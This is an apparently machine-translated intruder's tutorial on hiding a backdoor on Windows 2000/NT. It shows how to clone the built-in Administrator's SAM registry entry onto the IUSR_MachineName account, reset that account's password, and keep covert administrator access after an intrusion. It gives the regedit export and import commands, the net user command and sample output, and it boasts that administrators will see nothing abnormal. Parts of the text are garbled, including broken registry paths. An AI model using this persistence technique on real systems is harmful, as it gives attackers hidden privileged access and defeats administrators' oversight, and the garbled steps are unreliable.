How to copy an administrator account in an image system

It is often seen that some people create an Administrator group after they intrude into a Windows 2000 or Windows NT. It seems that when the Administrator does not exist, today I am against my previous intention, share is similar to RootKit. Of course, these processes can also be implemented using scripts, but I will not write them, OK, Show Time Now.

First, let everyone know the concept is that in Windows 2000 and Windows NT, the default Administrator Account SID is fixed 500 (0x1f4 ), we can use an existing account in the machine to clone the account with SID 500. Here we select the account IUSR_MachineName (of course, to enhance concealment, we chose this account. All users can use the following methods, but this user is common.) The test environment is Windows 2000 Server.

Run a System CMD Shell (http://www.sometips.com/tips/scripts/173.htm or Use Http: // www.sometips.com/soft/psu.exe) and then run:

Regedit/e adam. reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4

In this way, we export the information of the Administrator account whose SID is 500, and then edit adam. reg file, set adam. the third line of the reg file -- [HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4] The Last 1F4 is changed to the SID of IUSR_MachineName (for most machines, the user's SID is 0x3E9, if you create an account and then install IIS, it may not be the value. in the reg file, modify 1F4 to 3E9 and run the following command:

Regedit/s adam. reg

Import the Reg file and run:

Net user IUSR_MachineName Sometips

Change the IUSR_MachineName password (it is best to use a 14-bit password, the better the IUSR_MachineName password ).

In this way, we have the same desktop and Profile as the default Administrator. Also, when we run net localgroup administrators, let's see the result:

C:> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domainMembers
--------------------------------------------------------------------
Administrator
The command completed successfully.

Let's look at the output result of USER2SID:

C:> user2sid Administrator
S-1-5-21-1004336348-1078145449-854245398-500
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
C:> user2sid iusr_machinename
S-1-5-21-1004336348-1078145449-854245398-1001
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

I don't think a brilliant administrator can see any abnormalities... in addition, I can use IUSR_MachineName as the administrator's password and use Sometips to log on... (No chivalrous administrator prefers to change IUSR_MachineName to another name)